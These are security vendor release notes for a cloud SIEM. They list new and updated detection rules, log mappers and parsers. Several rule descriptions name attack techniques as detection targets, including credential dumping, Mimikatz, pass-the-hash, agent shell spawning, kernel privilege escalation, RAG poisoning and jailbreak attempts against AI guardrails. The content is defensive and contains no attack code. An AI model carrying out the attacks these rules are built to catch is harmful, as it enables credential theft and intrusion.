Sumo Logic Cloud SIEM Release Notes

• This content release includes:
  • Removed redundant field mappings for AWS CloudTrail and updated 40+ AWS CloudTrail rules. srcDevice_ip and device_ip are no longer mapped from the same source field. While out-of-the-box rules have been updated, custom rules that solely reference device_ip as an entity may require adjustments to be properly fed by the updated mappings.
  • 5 new AWS Bedrock security rules detecting RAG poisoning via external S3 data sources, knowledge base mass deletion, IAM privilege escalation targeting Bedrock services, and rapid guardrail intervention attempts indicating jailbreak activity
  • 4 new OpenClaw AI agent monitoring rules providing visibility into shell execution, out-of-band skill injection, child process outbound connections, and unsanctioned installations via network activity
  • 2 new Linux privilege escalation rules detecting exploitation of CVE-2026-31431 (CopyFail), a high-severity kernel vulnerability in the cryptographic subsystem that enables root access
  • Improved entity correlation across 40+ AWS CloudTrail rules through standardized device and source device field mappings
  • New Fortinet authentication log mapping with parser enhancements, and improved user agent extraction for Microsoft Office 365 authentication events
  • Changes are enumerated below

Rules​

• [New] MATCH-S01153 AF_ALG Socket Opened by Unprivileged Process
  • A unprivileged process on a Linux host opened a socket using the kernel cryptographic API subsystem
• [New] CHAIN-S00027 OpenClaw - Outbound Connection from Child Process
  • This ordered chain rule triggers when a child process of an openclaw-gateway node process is created on a host followed within 5 minutes by an outbound network connection to an external IP from the same process on the same host, grouped by process ID and hostname. Command lines associated with ip neighbor discovery are excluded as these can be a normal part of OpenClaw operation.
• [New] MATCH-S01149 OpenClaw - Shell Launch by Gateway
  • This rule triggers when a Node.js process with 'openclaw' in its command line spawns shell interpreters such bash, zsh, sh, PowerShell or python. It monitors process creation events to identify when OpenClaw's shell integration features actively execute system commands. Command lines associated with ip neighbor discovery are excluded as these can be a normal part of OpenClaw operation.
• [New] MATCH-S01152 OpenClaw - Skill Installed Out-of-Band
  • This rule triggers when a file matching .openclawskills*.md is created by a process whose base image is not "node" (the standard OpenClaw runtime). It monitors Sysmon FileCreate events and flags skill file writes that occur outside the official openclaw or clawhub installer processes.
• [New] MATCH-S01150 OpenClaw - Activity on Default Port
  • This rule triggers when a websocket connection to TCP port 18789 returns HTTP status 'Switching Protocols', indicating websocket handshake. Port 18789 is OpenClaw's default local server port, providing detection of active OpenClaw usage.
• [New] FIRST-S00101 AWS Bedrock - KB Data Source from External S3 Bucket
  • Detection: This rule triggers when an S3 bucket from an external AWS account is added to a Bedrock Knowledge Base via UpdateDataSource or CreateDataSource API calls in which the external AWS account hasn't been observed in the last 90 days.
• [New] THRESHOLD-S00125 AWS Bedrock - Knowledge Base Mass Deletion
  • This rule triggers when a user deletes multiple AWS Bedrock Knowledge Bases within a short time period from the same source IP address. It monitors CloudTrail logs for successful DeleteKnowledgeBase API calls and excludes AWS service-linked roles.
• [New] MATCH-S01151 AWS Bedrock - Privileged Permissions Granted
  • This rule triggers when Bedrock IAM permissions are granted through: (1) attachment of managed policies (AmazonBedrockFullAccess, AmazonBedrockStudioFullAccess), (2) creation of policies containing Bedrock actions, or (3) inline policy assignments. It monitors high-risk actions including model invocation, AI agent creation, guardrail deletion, logging configuration changes, knowledge base creation, and provisioned throughput allocation.
• [New] CHAIN-S00026 AWS Bedrock - Privileged Policy Created and Attached
  • This rule triggers when Bedrock IAM permissions are granted through the creation and attachment of an IAM policy with privileged Bedrock permissions including model invocation, AI agent creation, guardrail deletion, logging configuration changes, knowledge base creation, and provisioned throughput allocation.
• [New] THRESHOLD-S00124 AWS Bedrock - Rapid Guardrail Interventions
  • This rule triggers when 10 or more Bedrock Guardrail interventions occur within 60 seconds for a user. It monitors CloudWatch logs where stopReason equals 'guardrail_intervened', indicating the guardrail blocked model responses that violated content policies.
• [New] MATCH-S01154 Unexpected Root Process from Unprivileged Login Session
  • A user executed a program as root on a Linux host while the originating login session belongs to an unprivileged user, which is inconsistent with legitimate privilege escalation workflows.
• [Updated] MATCH-S00307 AWS - Excessive OAuth Application Permissions Scope
• [Updated] MATCH-S00306 AWS - New UserPoolClient Created
• [Updated] MATCH-S00921 AWS Bedrock Model Invocation Logging Configuration Change Observed
• [Updated] MATCH-S00715 AWS Cloud Storage Deletion
• [Updated] AGGREGATION-S00002 AWS CloudTrail - Aggressive Reconnaissance
• [Updated] LEGACY-S00207 AWS CloudTrail - Customer Master Key Disabled or Scheduled for Deletion
• [Updated] MATCH-S00261 AWS CloudTrail - Database Snapshot Created
• [Updated] MATCH-S00208 AWS CloudTrail - EC2 Access Key Action Detected
• [Updated] MATCH-S00246 AWS CloudTrail - GetSecretValue from non Amazon IP
• [Updated] MATCH-S00111 AWS CloudTrail - IAM CreateUser Action Observed
• [Updated] LEGACY-S00206 AWS CloudTrail - IAM Policy Applied
• [Updated] MATCH-S00101 AWS CloudTrail - IAM Privileged Policy Applied to Group
• [Updated] MATCH-S00104 AWS CloudTrail - IAM Privileged Policy Applied to Role
• [Updated] MATCH-S00099 AWS CloudTrail - IAM Privileged Policy Applied to User
• [Updated] THRESHOLD-S00051 AWS CloudTrail - IAM User Generating AccessDenied Errors Across Multiple Actions
• [Updated] MATCH-S00113 AWS CloudTrail - Logging Configuration Change Observed
• [Updated] MATCH-S00308 AWS CloudTrail - OpsWorks Describe Permissions Event
• [Updated] MATCH-S00109 AWS CloudTrail - Permissions Boundary Lifted
• [Updated] MATCH-S00105 AWS CloudTrail - Public S3 Bucket Exposed
• [Updated] MATCH-S00213 AWS CloudTrail - Reconnaissance related event
• [Updated] MATCH-S00096 AWS CloudTrail - Root Console Successful Login Observed
• [Updated] MATCH-S00764 AWS CloudTrail - S3 Bucket Public Access Block Disabled
• [Updated] MATCH-S00210 AWS CloudTrail - SQS List Queues Event
• [Updated] MATCH-S00240 AWS CloudTrail - ScheduleKeyDeletion in KMS
• [Updated] MATCH-S00247 AWS CloudTrail - Secrets Manager sensitive admin action observed
• [Updated] MATCH-S00238 AWS CloudTrail - sensitive activity in KMS
• [Updated] MATCH-S00540 AWS CloudTrail Network Access Control List Deleted
• [Updated] MATCH-S00664 AWS CloudWatch Alarm Actions Disabled
• [Updated] MATCH-S00663 AWS CloudWatch Alarm Deletion
• [Updated] MATCH-S00662 AWS CloudWatch Anomaly Detector Deletion
• [Updated] MATCH-S00665 AWS CloudWatch Log Group Deletion
• [Updated] MATCH-S00661 AWS CloudWatch Log Stream Deletion
• [Updated] MATCH-S00671 AWS Config Recorder Deletion
• [Updated] MATCH-S00672 AWS Config Recorder Stopped
• [Updated] MATCH-S00670 AWS Config Service Tampering
• [Updated] MATCH-S00654 AWS ECS Cluster Deleted
• [Updated] MATCH-S00716 AWS Image Creation
• [Updated] MATCH-S00717 AWS Image Deletion
• [Updated] THRESHOLD-S00106 AWS Image Discovery
• [Updated] MATCH-S00718 AWS Image Modification
• [Updated] MATCH-S00719 AWS Instance Creation
• [Updated] MATCH-S00720 AWS Instance Deletion
• [Updated] THRESHOLD-S00107 AWS Instance Discovery
• [Updated] MATCH-S00721 AWS Instance Modification
• [Updated] MATCH-S00679 AWS Route 53 Domain Registered
• [Updated] THRESHOLD-S00093 AWS Route 53 Reconnaissance
• [Updated] MATCH-S00677 AWS Route 53 Service Tampering
• [Updated] MATCH-S00680 AWS Route 53 TestDNSAnswer
• [Updated] MATCH-S00678 AWS Route 53 Traffic Policy Creation
• [Updated] MATCH-S00674 AWS WAF Access Control List Updated
• [Updated] THRESHOLD-S00092 AWS WAF Reconnaissance
• [Updated] MATCH-S00676 AWS WAF Rule Group Updated
• [Updated] MATCH-S00675 AWS WAF Rule Updated
• [Updated] MATCH-S00673 AWS WAF Service Tampering
• [Updated] MATCH-S00660 Anomalous AWS User Executed a Command on ECS Container
• [Updated] MATCH-S00686 Base64 Decode in Command Line
• [Updated] FIRST-S00085 First Seen Role Creating AWS Bedrock Agent
• [Updated] MATCH-S00655 New Container Uploaded to AWS ECR
• [Updated] MATCH-S00826 SSH Keys Added to EC2 Instance
• [Updated] MATCH-S00281 Windows - PowerShell Process Discovery

Log Mappers​

• [New] Fortinet Authentication Logs
• [Updated] CloudTrail - application-insights.amazonaws.com - ListApplications
• [Updated] CloudTrail - cloudtrail.amazonaws.com - Trail Change|Logging
• [Updated] CloudTrail - cognito-idp.amazonaws.com - CreateUserPoolClient
• [Updated] CloudTrail - controltower.amazonaws.com - CreateManagedAccount
• [Updated] CloudTrail - ec2.amazonaws.com - All Network Events
• [Updated] CloudTrail - ec2.amazonaws.com - BidEvictedEvent
• [Updated] CloudTrail - ecr.amazonaws.com - PolicyExecutionEvent
• [Updated] CloudTrail - ecs.amazonaws.com - AwsApiCall-ExecuteCommand
• [Updated] CloudTrail - elasticfilesystem.amazonaws.com - NewClientConnection
• [Updated] CloudTrail - iam.amazonaws.com - Policy Change
• [Updated] CloudTrail - kms.amazonaws.com - DisableKey|ScheduleKeyDeletion
• [Updated] CloudTrail - kms.amazonaws.com - RotateKey
• [Updated] CloudTrail - lambda.amazonaws.com - Audit Change
• [Updated] CloudTrail - lambda.amazonaws.com - DeleteEventSourceMapping|DeleteFunction
• [Updated] CloudTrail - lambda.amazonaws.com - DeleteFunctionUrlConfig
• [Updated] CloudTrail - lambda.amazonaws.com - GetFunction
• [Updated] CloudTrail - lambda.amazonaws.com - GetLayerVersionPolicy
• [Updated] CloudTrail - lambda.amazonaws.com - GetPolicy|GetLayerVersionPolicy
• [Updated] CloudTrail - lambda.amazonaws.com - ListEventSourceMappings
• [Updated] CloudTrail - lambda.amazonaws.com - ListFunctions
• [Updated] CloudTrail - lambda.amazonaws.com - Resource Access
• [Updated] CloudTrail - logs.amazonaws.com - DeleteDestination|DeleteLogGroup|DeleteLogStream
• [Updated] CloudTrail - organizations.amazonaws.com - CreateAccountResult
• [Updated] CloudTrail - s3.amazonaws.com - Bucket Change
• [Updated] CloudTrail - s3.amazonaws.com - GetBucketAcl
• [Updated] CloudTrail - secretsmanager.amazonaws.com - RotationSucceeded|RotationStarted
• [Updated] CloudTrail - secretsmanager.amazonaws.com - SecretVersionDeletion
• [Updated] CloudTrail - signin.amazonaws.com - All AwsConsoleSignIn events
• [Updated] CloudTrail - sso.amazonaws.com - Federate|ListProfilesForApplication
• [Updated] CloudTrail Batch get Partition
• [Updated] CloudTrail Default Mapping
• [Updated] Microsoft Office 365 Active Directory Authentication Events

Parsers​

• [Updated] /Parsers/System/Fortinet/Fortigate/Fortigate-Syslog
• [Updated] /Parsers/System/Microsoft/Office 365

This content release includes:

• Updated MITRE ATT&CK tactic and technique tags across 89 rules to align with the MITRE ATT&CK v19 framework update, which reorganized the former Defense Evasion tactic into Stealth and the new Defense Impairment tactic
• Affected rules now reference the correct successor techniques and tactic identifiers, ensuring accurate threat classification in detection workflows
• Additional changes are enumerated below

Rules​

• [Updated] MATCH-S00307 AWS - Excessive OAuth Application Permissions Scope
• [Updated] MATCH-S00306 AWS - New UserPoolClient Created
• [Updated] MATCH-S00261 AWS CloudTrail - Database Snapshot Created
• [Updated] MATCH-S00113 AWS CloudTrail - Logging Configuration Change Observed
• [Updated] MATCH-S00654 AWS ECS Cluster Deleted
• [Updated] MATCH-S00719 AWS Instance Creation
• [Updated] MATCH-S00720 AWS Instance Deletion
• [Updated] MATCH-S00721 AWS Instance Modification
• [Updated] MATCH-S00598 Alibaba ActionTrail Logging Configuration Change Observed
• [Updated] MATCH-S00516 Antivirus Ransomware Detection
• [Updated] MATCH-S00510 Attempt to Add Certificate to Store
• [Updated] MATCH-S00390 Attempted Credential Dump From Registry Via Reg.Exe
• [Updated] MATCH-S00805 Azure - Bastion Host Created/Modified
• [Updated] MATCH-S00806 Azure - Bastion Host Deleted
• [Updated] MATCH-S00808 Azure - Container Instance Creation/Modification
• [Updated] MATCH-S00809 Azure - Container Start
• [Updated] MATCH-S00786 Azure - SQL Database Export
• [Updated] MATCH-S00303 Azure - Unauthorized OAuth Application
• [Updated] MATCH-S00803 Azure - Virtual Machine Creation/Modification
• [Updated] MATCH-S00804 Azure - Virtual Machine Deleted
• [Updated] MATCH-S00801 Azure - Virtual Machine Started
• [Updated] MATCH-S00802 Azure - Virtual Machine Stopped
• [Updated] MATCH-S00896 Azure Authentication Policy Change
• [Updated] CHAIN-S00022 Azure DevOps - Agent Pool Created and Deleted within a Short Period
• [Updated] FIRST-S00099 Azure DevOps - First Seen User Creating Agent Pool
• [Updated] FIRST-S00092 Azure DevOps - First Seen User Creating Release Pipeline
• [Updated] FIRST-S00097 Azure DevOps - First Seen User Modifying Build Variables
• [Updated] FIRST-S00096 Azure DevOps - First Seen User Modifying Release Pipeline
• [Updated] OUTLIER-S00030 Azure DevOps - Outlier in Pools Deleted Rapidly
• [Updated] MATCH-S00891 Azure OAUTH Application Consent from User
• [Updated] MATCH-S00373 BlueMashroom DLL Load
• [Updated] MATCH-S01155 Claude Compliance API Logging Disabled
• [Updated] MATCH-S01157 Claude Organization IP Restriction Deleted
• [Updated] MATCH-S00758 CrashControl Registry Modification
• [Updated] MATCH-S00544 Disabling Remote User Account Control
• [Updated] MATCH-S00319 Dridex Process Pattern
• [Updated] MATCH-S00392 File or Folder Permissions Modifications
• [Updated] FIRST-S00037 First Seen AWS EKS Admission Controller Created by IP Address
• [Updated] FIRST-S00020 First Seen Azure OAUTH Application Consent from User
• [Updated] FIRST-S00030 First Seen Outbound Connection to External IP Address on Port 445 from IP Address
• [Updated] FIRST-S00034 First Seen Session Token Granted to User from New IP
• [Updated] FIRST-S00087 First Seen User Creating or Modifying EC2 Launch Template
• [Updated] MATCH-S00712 GCP Instance Creation
• [Updated] MATCH-S00713 GCP Instance Deletion
• [Updated] MATCH-S00714 GCP Instance Modification
• [Updated] MATCH-S00958 GitHub - PR Review Requirement Removed
• [Updated] MATCH-S00962 GitHub - Repository Visibility Permissions Changed
• [Updated] MATCH-S00964 GitHub - SSO Recovery Codes Access Activity
• [Updated] MATCH-S00966 GitHub - Two-Factor Authentication Disabled for Organization
• [Updated] MATCH-S00301 Google Workspace - Excessive OAuth Application Permissions Scope
• [Updated] MATCH-S00227 Google Workspace - Unauthorized OAuth Application
• [Updated] MATCH-S00894 HAR file creation observed on host
• [Updated] MATCH-S00850 LastPass - Policy Added
• [Updated] MATCH-S00851 LastPass - Policy Deleted
• [Updated] MATCH-S00852 LastPass - Shared Folder Created
• [Updated] MATCH-S00578 Lsass Registry Key Modified
• [Updated] MATCH-S00534 MacOS - Re-Opened Applications
• [Updated] MATCH-S00729 MacOS Gatekeeper Bypass
• [Updated] MATCH-S00731 MacOS System Integrity Protection Disabled
• [Updated] MATCH-S00397 Mimikatz Loaded Images Detected
• [Updated] MATCH-S00404 Mimikatz via Powershell and EventID 4703
• [Updated] MATCH-S00655 New Container Uploaded to AWS ECR
• [Updated] MATCH-S00906 Okta - Application Created
• [Updated] FIRST-S00067 Okta - First Seen Client ID/ASN combo in successful OIDC token grant
• [Updated] MATCH-S00683 Overly Permissive Chmod Command
• [Updated] MATCH-S00698 PATH Set to Current Directory
• [Updated] MATCH-S00704 Persistence Registry Key Modification
• [Updated] MATCH-S00200 Potential Pass the Hash Activity
• [Updated] MATCH-S00545 Registry Keys For Creating Shim Databases
• [Updated] MATCH-S00705 Registry Modification - Authentication Package
• [Updated] MATCH-S00730 Registry Modification - Code Signing
• [Updated] MATCH-S00735 Registry Modification - SIP or Trust Provider
• [Updated] MATCH-S00569 Registry Persistence Mechanisms
• [Updated] MATCH-S00328 Rubeus Hack Tool
• [Updated] MATCH-S00498 Rubeus Hack Tool Logon Process Name
• [Updated] LEGACY-S00094 Self-signed Certificates
• [Updated] MATCH-S00834 Sensitive Registry Key (WDigest) Edit
• [Updated] MATCH-S00196 Successful Overpass the Hash Attempt
• [Updated] LEGACY-S00182 Suspicious HTTP User-Agent
• [Updated] MATCH-S00135 Suspicious Registry Key Modification
• [Updated] MATCH-S00886 Suspicious chmod Execution
• [Updated] MATCH-S00567 Ursnif Malware Registry Key
• [Updated] MATCH-S00316 WannaCry Ransomware
• [Updated] MATCH-S00272 Windows - Rogue Domain Controller - dcshadow
• [Updated] MATCH-S00107 Windows - User Adds Self to Security Group
• [Updated] LEGACY-S00169 Windows Account Added To Privileged Security Group
• [Updated] MATCH-S00274 Windows Credential Editor (WCE) Tool Use Detected
• [Updated] MATCH-S00880 macOS - Entitlement Enumeration via Xattr

• This content release includes:
  • New support for Anthropic Claude activity logging via the Claude Compliance API, enabling detection and monitoring of administrative actions, Compliance API access, data exports, IP restriction changes, and anomalous resource activity across Claude organizations
  • Six new detection rules targeting administrative abuse and data loss risk: unauthorized API key creation, compliance logging disablement, IP restriction deletion, first-time data exports, and spikes in Compliance API calls or resource deletions
  • New parser and 70+ log mappers for Anthropic Claude Activity Logs to support ingestion and normalization of Claude organization activity data
  • Additional changes are enumerated below

Rules​

• [New] MATCH-S01156 Claude Admin or Platform API Key Created
  • This rule triggers when a new Admin or Platform API key is created within a Claude organization.
• [New] MATCH-S01155 Claude Compliance API Logging Disabled
  • This rule triggers when an administrator disables Compliance API activity logging for the organization.
• [New] MATCH-S01157 Claude Organization IP Restriction Deleted
  • This rule triggers when an IP restriction is deleted from a Claude organization, removing a network access control.
• [New] FIRST-S00102 First Seen User Initiating Claude Data Export
  • This rule triggers the first time a user initiates a Claude organization data export within a 90-day baseline window.
• [New] OUTLIER-S00034 Outlier in Claude Compliance API Calls from User
  • This rule triggers when the number of Compliance API calls from a single user in a one-hour window exceeds the established baseline by 2 standard deviations with a minimum floor of 15 calls.
• [New] OUTLIER-S00035 Outlier in Claude Resource Deletions from User
  • This rule triggers when the number of Claude resource deletions (chats, projects, and files) from a single user in a one-hour window exceeds the established baseline by 2 standard deviations with a minimum floor of 5 deletions.
• [Updated] OUTLIER-S00007 Spike in Windows Administrative Privileges Granted for User
  • This rule has been updated to force case insensitivity in the match expression for user accounts, ensuring more consistent detection of spikes in administrative privileges granted regardless of username casing.

Log Mappers​

• [New] Claude - Admin API Key Events
• [New] Claude - Authentication Events
• [New] Claude - account_deleted
• [New] Claude - api_key_created
• [New] Claude - claude_artifact_sharing_updated
• [New] Claude - claude_artifact_viewed
• [New] Claude - claude_chat_created
• [New] Claude - claude_chat_deleted
• [New] Claude - claude_chat_viewed
• [New] Claude - claude_code_review_config_updated
• [New] Claude - claude_code_review_repository_added
• [New] Claude - claude_code_review_repository_removed
• [New] Claude - claude_code_security_center_config_updated
• [New] Claude - claude_file_deleted
• [New] Claude - claude_file_uploaded
• [New] Claude - claude_file_viewed
• [New] Claude - claude_organization_settings_updated
• [New] Claude - claude_project_created
• [New] Claude - claude_project_deleted
• [New] Claude - claude_project_sharing_updated
• [New] Claude - claude_project_viewed
• [New] Claude - claude_skill_created
• [New] Claude - claude_user_settings_updated
• [New] Claude - cli_plugin_exec_policy_updated
• [New] Claude - compliance_api_accessed
• [New] Claude - desktop_extension_allowlisted
• [New] Claude - desktop_extension_blocklisted
• [New] Claude - desktop_extension_deleted
• [New] Claude - desktop_extension_removed_from_allowlist
• [New] Claude - desktop_extension_unblocked
• [New] Claude - domain_claim_initiated
• [New] Claude - mcp_server_created
• [New] Claude - mcp_server_deleted
• [New] Claude - mcp_server_updated
• [New] Claude - mcp_tool_policy_updated
• [New] Claude - org_compliance_api_settings_updated
• [New] Claude - org_cowork_disabled
• [New] Claude - org_data_export_completed
• [New] Claude - org_data_export_started
• [New] Claude - org_invite_link_disabled
• [New] Claude - org_invite_link_generated
• [New] Claude - org_ip_restriction_created
• [New] Claude - org_ip_restriction_deleted
• [New] Claude - org_ip_restriction_updated
• [New] Claude - org_member_invites_disabled
• [New] Claude - org_member_invites_enabled
• [New] Claude - org_sso_connection_activated
• [New] Claude - org_sso_connection_deactivated
• [New] Claude - org_sso_connection_deleted
• [New] Claude - org_user_invite_accepted
• [New] Claude - org_user_invite_sent
• [New] Claude - platform_api_key_created
• [New] Claude - platform_federation_issuer_archived
• [New] Claude - platform_federation_issuer_updated
• [New] Claude - platform_federation_rule_archived
• [New] Claude - platform_federation_rule_updated
• [New] Claude - platform_federation_rule_workspace_added
• [New] Claude - platform_federation_rule_workspace_removed
• [New] Claude - platform_file_deleted
• [New] Claude - platform_file_uploaded
• [New] Claude - platform_service_account_archived
• [New] Claude - platform_service_account_updated
• [New] Claude - platform_workspace_created
• [New] Claude - platform_workspace_rate_limit_deleted
• [New] Claude - platform_workspace_rate_limit_updated
• [New] Claude - role_assignment_granted
• [New] Claude - tunnel_token_minted
• [New] Claude - tunnel_token_revoked
• [New] Claude - user_consent_revoked
• [New] Claude - user_logged_out
• [New] Claude Activity Logs - Catch All
• [Updated] Imperva Incapsula Logs

Parsers​

• [New] /Parsers/System/Anthropic/Claude Activity Logs

• This content release includes:
  • Removed redundant Cisco Umbrella and Okta field mappings for hosts and from corresponding rules
  • New Laurel Linux Audit process start mapper for enhanced Linux process execution visibility
  • AWS WAF parser enhancement to extract cookies
  • Fortinet Fortigate severity mapping fix
  • Changes are enumerated below

Rules​

• [Updated] THRESHOLD-S00016 HTTP Response Error Spike - Internal
• [Updated] THRESHOLD-S00099 Long URL Containing SQL Commands
• [Updated] OUTLIER-S00016 Okta - Outlier in OIDC token request failures
• [Updated] MATCH-S00835 Possible Dynamic URL Domain
• [Updated] LEGACY-S00182 Suspicious HTTP User-Agent

Log Mappers​

• [New] Laurel Linux Audit - Process Start
• [Updated] Fortinet UTM IDS1
• [Updated] Laurel Linux Audit - System Call
• [Updated] Okta Authentication - auth_via_AD_agent
• [Updated] Okta Authentication - auth_via_mfa
• [Updated] Okta Authentication - auth_via_radius
• [Updated] Okta Authentication - sso
• [Updated] Okta Authentication Events
• [Updated] Okta Catch All
• [Updated] Okta Security Threat Events

Parsers​

• [Updated] /Parsers/System/AWS/AWS WAF
• [Updated] /Parsers/System/Fortinet/Fortigate/Fortigate-CEF

• This content release includes:
  • Enhanced Fortinet field mappings with standardized severity normalization, session tracking, and device identification across 27 log mappers, plus removal of 3 redundant mappers
  • Windows and Linux Sysmon mapper improvements ensuring normalizedAction and normalizedResource fields are consistently populated across all 44 event types for better query performance and standardization
  • Citrix Cloud C2C parser and mapper updates adding session log support for monitoring user authentication, connection lifecycle, and session state transitions
  • MITRE ATT&CK Tactics & Techniques updated to v19
    • Rule updates corresponding to new and deprecated Tactics & Techniques.
  • Changes are enumerated below

Rules​

• [Updated] MATCH-S00924 AWS Bedrock Guardrail Deleted
• [Updated] MATCH-S00921 AWS Bedrock Model Invocation Logging Configuration Change Observed
• [Updated] MATCH-S00113 AWS CloudTrail - Logging Configuration Change Observed
• [Updated] MATCH-S00540 AWS CloudTrail Network Access Control List Deleted
• [Updated] MATCH-S00664 AWS CloudWatch Alarm Actions Disabled
• [Updated] MATCH-S00663 AWS CloudWatch Alarm Deletion
• [Updated] MATCH-S00662 AWS CloudWatch Anomaly Detector Deletion
• [Updated] MATCH-S00665 AWS CloudWatch Log Group Deletion
• [Updated] MATCH-S00661 AWS CloudWatch Log Stream Deletion
• [Updated] MATCH-S00671 AWS Config Recorder Deletion
• [Updated] MATCH-S00672 AWS Config Recorder Stopped
• [Updated] MATCH-S00670 AWS Config Service Tampering
• [Updated] MATCH-S00677 AWS Route 53 Service Tampering
• [Updated] MATCH-S00674 AWS WAF Access Control List Updated
• [Updated] MATCH-S00676 AWS WAF Rule Group Updated
• [Updated] MATCH-S00675 AWS WAF Rule Updated
• [Updated] MATCH-S00673 AWS WAF Service Tampering
• [Updated] MATCH-S00598 Alibaba ActionTrail Logging Configuration Change Observed
• [Updated] MATCH-S00589 Alibaba ActionTrail Network Access Control List Deleted
• [Updated] MATCH-S00516 Antivirus Ransomware Detection
• [Updated] MATCH-S00415 Attempt to Clear Windows Event Logs Using Wevtutil
• [Updated] MATCH-S00795 Azure - Diagnostic Setting Deleted
• [Updated] MATCH-S00796 Azure - Diagnostic Setting Modified
• [Updated] MATCH-S00797 Azure - Event Hub Deleted
• [Updated] MATCH-S00864 Azure Firewall Rule Modified
• [Updated] MATCH-S00373 BlueMashroom DLL Load
• [Updated] MATCH-S00388 COMPlus_ETWEnabled Command Line Arguments
• [Updated] LEGACY-S00037 Fortinet Critical App-Risk
• [Updated] LEGACY-S00038 Fortinet High App-Risk
• [Updated] MATCH-S00620 GCP Audit Cloud SQL Database Modified
• [Updated] MATCH-S00621 GCP Audit GCE Firewall Rule Modified
• [Updated] MATCH-S00622 GCP Audit GCE Network Route Created or Modified
• [Updated] MATCH-S00623 GCP Audit GCE VPC Network Modified
• [Updated] MATCH-S00626 GCP Audit Logging Sink Modified
• [Updated] MATCH-S00627 GCP Audit Pub/Sub Subscriber Modified
• [Updated] MATCH-S00628 GCP Audit Pub/Sub Topic Deleted
• [Updated] MATCH-S00953 GitHub - Audit Logging Modification
• [Updated] MATCH-S00962 GitHub - Repository Visibility Permissions Changed
• [Updated] MATCH-S00288 NotPetya Ransomware Activity
• [Updated] MATCH-S00831 Office 365 Unified Audit Logging Disabled
• [Updated] THRESHOLD-S00048 Outbound Traffic to Countries Outside the United States
• [Updated] MATCH-S00546 Potential Reconnaissance Obfuscation
• [Updated] LEGACY-S00080 SSH Interesting Hostname Login
• [Updated] LEGACY-S00170 The Audit Log was Cleared - 1102
• [Updated] MATCH-S01024 Threat Intel - Destination IP Address (High Confidence)
• [Updated] MATCH-S01026 Threat Intel - Destination IP Address (Low Confidence)
• [Updated] MATCH-S01028 Threat Intel - Destination IP Address (Medium Confidence)
• [Updated] MATCH-S01023 Threat Intel - Inbound Traffic from Threat Feed IP (High Confidence)
• [Updated] MATCH-S01025 Threat Intel - Inbound Traffic from Threat Feed IP (Low Confidence)
• [Updated] MATCH-S01027 Threat Intel - Inbound Traffic from Threat Feed IP (Medium Confidence)
• [Updated] MATCH-S00531 Unload Sysmon Filter Driver
• [Updated] MATCH-S00892 Value Added to Azure NSG Group
• [Updated] MATCH-S00521 Windows - Critical Service Disabled via Command Line
• [Updated] MATCH-S00549 Windows Disable Antispyware Registry
• [Updated] MATCH-S00538 Windows Firewall Rule Added
• [Updated] MATCH-S00537 Windows Firewall Rule Deleted
• [Updated] MATCH-S00536 Windows Firewall Rule Modified
• [Updated] MATCH-S00533 Windows Security Account Manager Stopped

Log Mappers​

• [Deleted] Fortinet DNS Query
• [Deleted] Fortinet Traffic2
• [Deleted] Fortinet dns Logs
• [New] Citrix Cloud Session Logs
• [Updated] Fortinet Anomaly Logs
• [Updated] Fortinet Appctrl1
• [Updated] Fortinet Appctrl2
• [Updated] Fortinet Authentication
• [Updated] Fortinet DLP Logs
• [Updated] Fortinet DNS
• [Updated] Fortinet Endpoint
• [Updated] Fortinet Event Logs
• [Updated] Fortinet FortiGate-200D Auth CEF
• [Updated] Fortinet FortiGate-200D Endpoint CEF
• [Updated] Fortinet FortiGate-200D Flow CEF
• [Updated] Fortinet Traffic
• [Updated] Fortinet UTM IDS1
• [Updated] Fortinet VPN
• [Updated] Fortinet Virus
• [Updated] Fortinet ha Logs
• [Updated] Fortinet perf-stats pba-close Systems Logs
• [Updated] Fortinet security-rating Logs
• [Updated] Fortinet ssl Logs
• [Updated] Fortinet voip Logs
• [Updated] Fortinet wad Logs
• [Updated] Fortinet waf Logs
• [Updated] Fortinet wireless Logs
• [Updated] Linux-Sysmon/Operational - 1
• [Updated] Linux-Sysmon/Operational - 10
• [Updated] Linux-Sysmon/Operational - 15
• [Updated] Linux-Sysmon/Operational - 16
• [Updated] Linux-Sysmon/Operational - 17
• [Updated] Linux-Sysmon/Operational - 18
• [Updated] Linux-Sysmon/Operational - 2
• [Updated] Linux-Sysmon/Operational - 23
• [Updated] Linux-Sysmon/Operational - 3
• [Updated] Linux-Sysmon/Operational - 4
• [Updated] Linux-Sysmon/Operational - 5
• [Updated] Linux-Sysmon/Operational - 6
• [Updated] Linux-Sysmon/Operational - 7
• [Updated] Linux-Sysmon/Operational - 8
• [Updated] Linux-Sysmon/Operational - 9
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 1
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 10
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 12, 13, and 14
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 15
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 16
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 17
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 18
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 19|20
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 2
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 21
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 22
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 23
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 24
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 25
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 26
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 27
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 28
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 3
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 4
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 5
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 6
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 7
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 8
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 9
• [Updated] Windows - Microsoft-Windows-Sysmon/Operational-29

Parsers​

• [Updated] /Parsers/System/Citrix/Citrix Cloud C2C

Schema​

Updated MITRE ATT&CK Tactics & Techniques to v19

This content release includes:

• New AWS Bedrock audit logging to track knowledge base deletion events.
• Enhanced field mappings and parsing for Netskope security events, improving username extraction, threat categorization, and anomaly detection across 14 log mappers.
• Updated Microsoft Exchange Message Trace mapper and parser to support Graph API log format with improved email tracking and user identification.
